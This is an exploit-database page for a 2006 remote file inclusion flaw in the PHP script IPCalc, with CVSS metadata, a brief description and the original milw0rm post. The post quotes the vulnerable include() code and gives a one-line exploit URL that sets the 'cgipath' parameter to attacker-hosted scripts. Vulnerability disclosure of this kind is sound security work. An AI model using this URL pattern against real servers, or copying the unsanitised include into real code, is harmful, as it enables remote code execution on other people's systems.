header-logo
Suggest Exploit
vendor:
IPCalc
by:
DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: IPCalc
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

IPCalc Remote File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'type' and 'cgipath' parameters in 'ip.inc.php' script. A remote attacker can include arbitrary files from remote hosts and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be performed to ensure that untrusted input is rejected.
Source

Exploit-DB raw data:

Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz
 
Code: if($type == 1) { $url = "$cgipath" . "ipcalc.cgi"; } else {
$url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2";
}nclude("$url");
 
Exploit:www.target.com/ip.inc.php?type=1&cgipath=evilscripts
 
Found: Cyber-Security
 
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]